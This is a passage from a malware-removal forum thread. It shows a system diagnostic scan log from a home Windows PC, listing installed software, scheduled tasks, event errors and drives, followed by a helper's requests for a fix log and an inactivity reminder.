Bing Bar (HKLM\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 6.0.2237.0 - Microsoft Corporation)
Bing Bar Platform (Version: 6.0.2237.0 - Microsoft Corporation) Hidden
Bing Rewards Client Installer (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Citrix Online Launcher (HKLM\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
Google Chrome (HKLM\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Earth Plug-in (HKLM\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden
GoToMeeting 6.4.5.1865 (HKCU\...\GoToMeeting) (Version: 6.4.5.1865 - CitrixOnline)
Hewlett-Packard ACLM.NET v1.2.2.3 (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Setup (HKLM\...\{1E6219D4-027E-47EE-AB83-DD2F26E31A32}) (Version: 1.2.3557.3169 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.4.0 - Hewlett-Packard)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{5FEBF468-5AC2-4C66-AD80-DF85C085AA73}) (Version: 8.5.10.36 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.5.10.36 - InterVideo Inc.) Hidden
Kyocera Scanner File Utility (HKLM\...\{61C79AE1-5403-4687-AC68-28BFA5EF3895}) (Version: 3.16.9 - KyoceraMita)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Browser Protection Service (HKLM\...\McAfee SiteAdvisor) (Version: 2.5.0.6173 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Basic 2007 (HKLM\...\BASICR) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDF Complete Special Edition (HKLM\...\PDF Complete) (Version: 3.5.109 - PDF Complete, Inc)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)
Sophos Virus Removal Tool (HKLM\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.3 - Sophos Limited)
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
WordPerfect Office 11 (HKLM\...\{54F90B55-BEB3-4F0D-8802-228822FA5921}) (Version: 11.0 - Corel Corporation)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1350\G2MOutlookAddin.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)
 
==================== Restore Points  =========================
 
28-10-2014 13:40:22 ComboFix created restore point
03-11-2014 21:59:10 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2014-10-28 08:22 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0C92239F-3E49-499D-9AF1-C4B116AD46BB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {21866111-A928-4F98-AF0C-EEAE9A8E1996} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {67385F60-249C-4354-ADD2-620471A359CC} - System32\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001 => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-27] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {7375CCFD-6B94-41ED-961E-F6F9C08DAFA6} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {7F504C59-599B-49DA-A3EE-B859AC0BF85C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {87C410B8-33B3-45C6-B500-AD9A206C9502} - System32\Tasks\HPCeeScheduleForKELI => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {8A443DB3-B5C1-48D7-B440-F451210C0D61} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-06] ()
Task: {AB8E1262-14E5-4EA0-9F63-97672EDA7F30} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-27] (Google Inc.)
Task: {EA69A0AE-1152-488A-9731-1437A029D2F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job => C:\Users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForKELI.job => C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Loaded Modules (whitelisted) =============
 
2010-10-16 11:15 - 2010-10-16 11:15 - 00341280 _____ () C:\Program Files\SiteAdvisor\6173\SAService.exe
2010-10-16 11:07 - 2009-07-24 14:29 - 00077824 _____ () C:\Program Files\Common Files\Intel\Privacy Icon\UNS\DTMessageLib.dll
2010-10-16 11:15 - 2007-08-28 15:07 - 00036640 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
2010-10-16 11:15 - 2007-08-28 15:06 - 00910624 _____ () C:\Program Files\SiteAdvisor\6173\SiteAdv.dll
2011-03-24 19:16 - 2000-11-09 10:17 - 00190464 _____ () C:\Program Files\Kyocera\FileUtility\HgTiff2Pdf.dll
2014-11-06 08:43 - 2014-11-06 08:43 - 00043008 _____ () c:\users\keli\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpz1liyd.dll
2013-08-23 14:01 - 2013-08-23 14:01 - 25100288 _____ () C:\Users\KELI\AppData\Roaming\Dropbox\bin\libcef.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-28 08:38 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-10-28 08:38 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3621039740-3434257137-3815352865-500 - Administrator - Disabled)
Guest (S-1-5-21-3621039740-3434257137-3815352865-501 - Limited - Enabled)
KELI (S-1-5-21-3621039740-3434257137-3815352865-1001 - Administrator - Enabled) => C:\Users\KELI
McAfeeMVSUser (S-1-5-21-3621039740-3434257137-3815352865-1000 - Limited - Enabled)
 
==================== Faulty Device Manager Devices =============
 
Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
Name: Standard PS/2 Keyboard
Description: Standard PS/2 Keyboard
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (Standard keyboards)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/05/2014 01:03:07 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (11/04/2014 00:40:35 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/30/2014 08:52:10 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/29/2014 09:25:54 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/27/2014 05:52:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762"1".
Dependent Assembly Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50727.762" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/27/2014 03:21:19 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
Error: (10/27/2014 03:21:19 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 03:21:19 PM) (Source: VSS) (EventID: 18) (User: )
Description: Volume Shadow Copy Service error: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name IVssCoordinatorEx2 cannot be started during Safe Mode.
The Volume Shadow Copy service cannot start while in safe mode. [0x8007043c, This service cannot be started in Safe Mode
]
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 03:17:20 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Windows\system32\wbem\wmiprvse.exe; Description = ComboFix created restore point; Error = 0x8007043c).
 
Error: (10/27/2014 03:17:20 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007043c, This service cannot be started in Safe Mode
.
 
 
Operation:
   Instantiating VSS server
 
 
System errors:
=============
Error: (11/06/2014 08:43:52 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/06/2014 08:39:51 AM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/06/2014 08:37:33 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/05/2014 09:12:16 AM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/05/2014 09:09:44 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/04/2014 00:33:17 PM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/03/2014 04:59:50 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The EngineServer service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/02/2014 00:33:15 PM) (Source: DCOM) (EventID: 10000) (User: )
Description: "C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe" -Embedding740{1B185737-A3CA-44BC-8915-057B115596C7}
 
Error: (11/01/2014 06:59:25 PM) (Source: Microsoft-Windows-TBS) (EventID: 16385) (User: NT AUTHORITY)
Description: An internal TBS error was detected.  The error code was 0x8007001f.  This is usually caused by unexpected TPM or driver behavior and may be transient.
 
Error: (11/01/2014 06:59:25 PM) (Source: Microsoft-Windows-TBS) (EventID: 516) (User: NT AUTHORITY)
Description: An error occurred while communicating with the TPM.  The driver returned 0x8007001f.
 
 
Microsoft Office Sessions:
=========================
Error: (09/17/2013 11:57:00 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1955 seconds with 600 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:34 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:24 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:26:04 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:42 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 8 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 9 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 01:25:03 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 25 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
==================== Memory info =========================== 
 
Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 49%
Total physical RAM: 1993.25 MB
Available physical RAM: 996.73 MB
Total Pagefile: 3986.49 MB
Available Pagefile: 2840.71 MB
Total Virtual: 2047.88 MB
Available Virtual: 1899.4 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:139.55 GB) (Free:99.9 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:7.49 GB) (Free:0.86 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 149.1 GB) (Disk ID: 3B723303)
Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=139.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=7.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#14 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 06 November 2014 - 12:34 PM

Please post the Fixlog.txt as well... :)
regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#15 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 09 November 2014 - 12:04 PM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 



